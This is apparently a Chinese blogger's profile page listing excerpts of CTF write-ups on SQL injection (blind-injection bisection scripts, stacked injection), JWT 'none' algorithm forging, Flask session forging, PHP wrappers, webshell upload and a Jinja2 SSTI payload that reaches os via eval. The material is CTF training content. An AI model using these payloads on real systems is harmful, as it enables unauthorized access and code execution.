自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 收藏
  • 关注

原创 [ICMP流量分析]CTFHUB------Length

首先通过关键字过滤ICMP之后,从题目Length猜出可能与长度有关,我们知道这个平台默认flag开头是ctfhub{},发现c与f相差3个ascii码值,查看数据包也是一样的接下来把每条长度读取即可,根据记录可以得到flag#!/usr/bin/python# coding=utf8# @Author:Y4tackernum = ord('c')num = 141 - numnum_list = [不可能给你自己研究哈,不吃白食]new_list = []for i in num

2020-08-28 16:15:21 8594

原创 Python与JWT的使用

import jwtdef create_token(): # 构造header headers = { 'typ': 'jwt', 'alg': 'none' } # 构造payload payload = { "username": "admin", "password": "admin", "role": "admin" } result = jwt.encod

2020-08-26 14:14:28 6027

原创 [CTFHUB]迟来的签到题

直接异或给的串中所有字符文件名改为你网上下载的那个文件with open('task', 'rb') as f: b = f.readlines()print(b)c = b''for i in b: c += iprint(c)data = list(c)print(data)for k in range(200): flag = "" for i in range(len(data)): flag += chr(data[i] ^ o

2020-08-26 11:45:37 6387

原创 [文件上传][源码泄露]2017-赛客夏令营-Web-Uploadddd

首先上传一下一句话木马文件,发现没有过滤,但是无论如何我们都找不到那个文件地址,猜想可能有源码泄露通过目录扫描发现文件.index.php.swp,关于.swp格式文件是异常退出时linux生成的,具体可以百度之后访问后,我们得到这个文件,推荐用linux的vim打开,但是考虑到这道题比较简单,直接记事本吧,发现文件名的规则打个比方,就如上传的这个文件,那么的格式应该是url+20200826024904+(0-999的随机数)+.php知道这个规则后我写了个多线程的Python脚本,如果找

2020-08-26 11:08:49 6092

原创 [SQL盲注][极客大挑战 2019]FinalSQL(二分法)

发现过滤了一堆比如*空格之类的我们用()绕过上脚本,网站太垃圾了请求的快,就要出错,还要加一个sleep等一下import timeimport requestsurl = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id="result = ''i = 0while True: i = i + 1 head = 32 tail = 127 while h

2020-08-16 15:03:28 6139

原创 [SQL注入][Stacked injection]sqli-labs学习记录(38-53关)

学习记录前置知识堆叠注入第38关 ------ 简单堆叠注入第39关 ------ 数字型+堆叠注入第40关 ------ 闭合`')`+堆叠注入第41关 ------ 盲注+堆叠注入第42关 ------ POST型+堆叠注入第43关 ------ 类似42关(堆叠注入)第44关 ------前置知识堆叠注入本来想写的,但是网上一堆堆就不班门弄斧了,看师傅们的吧堆叠注入详解第38关 ------ 简单堆叠注入经过简单的测试我们推测sql语句为:SELECT * FROM users WHER

2020-08-11 19:49:13 6067

原创 [SQL注入][Advanced injection]sqli-labs学习记录(23-37关)

学习记录前置知识二次排序注入思路服务器架构(以靶场为例)---参考Mysql天书第23关 ------ 注释符号过滤第24关 ------ 二次注入第25关 ------ or与and过滤第25a关 ------ or与and过滤第26关 ------ 注释and与or与空格第26a关 ------ 不使用报错注入第27关 ----- 大小写或双写绕过第27a关 ------ 稍微加强了过滤规则第28关 ------ 同27关没区别第28a关 ------ 第28关简化版(没意义)![在这里插入图片描述](

2020-08-10 18:06:59 6061

原创 [SQL注入][Basci Challenges]sqli-labs学习记录(1-22关)

学习记录前置小知识点系统函数字符串连接函数一般用于替换的语句union 操作符盲注小知识点布尔型逻辑判断配合正则注入Payloadexp 报错bigint溢出其他基于时间的盲注第一关--字符型注入第二关--数字型注入第三关--构造闭合第四关 ---闭合sql语句第五关 ----- 盲注第六关 ------时间盲注与报错注入第七关 --- 文件导入第八关 --- 盲注第九关-----时间盲注第十关-----基于双引号的时间盲注第十一关-----POST型注入前置小知识点系统函数version()——My

2020-08-10 12:38:25 6703

原创 [代码审计][攻防世界][NSCTF]Web2

打开题目,哦代码审计啊,看着要解密的亚子,看我的笔记吧<?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); //字符反转 for($_0=0;$_0<strlen($_o);$_0++){ //函数功能是把每一位的对应ASCII码值+1然后转换为字符

2020-08-08 14:10:25 6004 1

原创 [代码审计][备份泄露][时间盲注]CTFSHOW----WEB15(不会做以后补充)

文章目录备份文件代码审计备份文件首先题目hint里面说了是源码泄露,我自己随便输入也发现了www.zip,但是还是走流程吧,用dirsearch工具,从这里我们也能发现突破口代码审计首先这是它给的压缩包,从里面我看了一下发现关键文件2020.php发现是基于X-Forwarded-For,也就是XFF头的注入<?phprequire_once './include/common.php';$realip = real_ip();$ipcount = $DB->count("

2020-08-06 09:57:01 7236 3

原创 [SQL注入][强网杯 2019]随便注(三种姿势)

文章目录姿势一 ---- 常规堆叠注入姿势二---预处理语句姿势三 --- handeler参考文章前言:1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关姿势一 ---- 常规堆叠注入堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句。首先老规矩输入1加个单引号,报错注释掉后面大概猜到表的结构了selsect id,data from words where id =,并

2020-08-05 20:15:04 8258

原创 [代码审计][HCTF 2018]WarmUp与CVE-2018-12613

文章目录前言WPCVE-2018-12613前言在request请求当中就会被url解码一次,这就是接下来为什么会需要两次编码绕过WP打开靶机看到一个滑稽图片,审查元素发现有个source.php访问发现需要我们进行代码审计,下面对代码进行分析 highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {

2020-08-05 19:05:16 5863 1

原创 [SQL绕过]md5($str,true)类型绕过----题目来源CTFSHOW---web9

起初不管输入什么都没有回显,访问robots.txt下载查看源代码<?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from user where username ='admin' and password ='".md5($password,true)."'"; $resu

2020-08-05 13:38:57 7152 1

原创 [SQL盲注]CTFSHOW------WEB8(二分法快速爆出数据)

补充一些绕过方法:1.将limit 0,1样式改为limit 1 offset 0。2.将substr(string,1,1)改为substr(string from 1 for 1)。这道题是盲注,至于是为什么可以看其他师傅的,我不想多说,只是想记录下我的脚本而已我的payload分别是查数据库、数据表、列名和爆字段,自己取消注释玩,然后url前半部分改成你的靶机的urlimport requestsurl = "http://a448d26a-b594-47a1-b3e0-fddbe1d

2020-08-05 13:28:08 6425 2

原创 [SQL盲注]CTFSHOW------WEB7(二分法快速爆出数据)

这道题是盲注,至于是为什么可以看其他师傅的,我不想多说,只是想记录下我的脚本而已我的payload分别是查数据库、数据表、列名和爆字段,自己取消注释玩,然后url前半部分改成你的靶机的urlimport requestsurl = "http://ef1aa69c-3250-414b-9468-0c03efbfbd6f.chall.ctf.show/?id='/**/"result = ''i = 0while True: i = i + 1 head = 32

2020-08-05 11:12:39 6076 1

原创 [SQL注入]CTFSHOW-----WEB6(空格绕过)

首先,通过抓包发现这个报错去掉空格后恢复正常,因此我们得想到用/**/绕过空格万能登陆密码登录检测回显位置—得到回显位为2查表名查列名爆数据

2020-08-05 10:22:49 6056

原创 [SQL]记一次流量分析

首先下载下来是一堆流量包,发现是与sql注入有关的过滤关键字得到下面文件分析知,前面部分是sql注入中通过盲注爆数据库,数据表,字段最后看到一个flag通过对比包差异性得到最终结果,不过flag样子挺奇怪上个python脚本def pr(name, a): tmp = '' for i in a: tmp += chr(i) print(name + ':' + tmp)if __name__ == '__main__': flag =

2020-08-04 17:47:04 7104 1

原创 CTF中常用的php伪协议总结

文章目录总览file://php://php://filterphp://inputdata://参考文章总览php:// — 访问各个输入/输出流(I/O streams)file:// — 访问本地文件系统phar:// — PHP 归档zlib:// — 压缩流data:// — 数据(RFC 2397)http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsglob:// — 查找匹配的文件路径模式ssh2:// — Secure Shell

2020-08-04 10:11:22 8159

原创 SSTI模板注入及绕过姿势(基于Python-Jinja2)

http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}

2020-08-02 22:19:10 14550 2

原创 [代码审计]PHP中session的存储方式(WP)

前言:引用了各路大佬参考资料,整合成自己能够看懂并接受的笔记,欢迎指正,前面先总结Session的常用知识,后面展开对题目WP的讲解文章目录SESSION的常用知识基本概念要点Session基本介绍Session工作原理一些与解题相关基本概念session存储的方式session存储格式(序列化)session如何将session存入数据库并使用session的存储位置session存储的默认文件名PHP Session 基本函数的介绍WP部分参考文献SESSION的常用知识基本概念要点保存在

2020-08-02 20:43:24 9103 3

原创 Flask之session伪造(从某平台学习Session身份伪造)

文章目录工具介绍FLASK解密FLASK加密脚本工具介绍FLASK解密不推荐网上那个,反而这个倒是挺好用#!/usr/bin/env python3import sysimport zlibfrom base64 import b64decodefrom flask.sessions import session_json_serializerfrom itsdangerous import base64_decodedef decryption(payload): payl

2020-08-02 16:31:39 13238

原创 [代码审计]PHP代码审计之create_function()函数

前言:引用了各路大佬参考资料,整合成自己能够看懂并接受的笔记,欢迎指正学习一点小知识:// 这是 PHP 单行注释/*这是 PHP 多行注释*//*直接注释掉后面所有代码`文章目录create_function()简介基本使用代码片段运行截图分析代码注入案例案例一案例二参考资料--欢迎考证create_function()简介适用范围:PHP 4> = 4.0.1,PHP 5,PHP 7功能:根据传递的参数创建匿名函数,并为其返回唯一名称。语法:create_function(st

2020-08-02 15:32:30 7907

原创 [BUUOJ][WUSTCTF2020]颜值成绩查询 ---二分法

import requestsurl = "http://93b7e81c-3dd4-4eaf-9ddf-8342b4e4bc7a.node3.buuoj.cn/?stunum="result = ""i = 0while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # payload = "

2020-08-01 13:57:57 7520

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除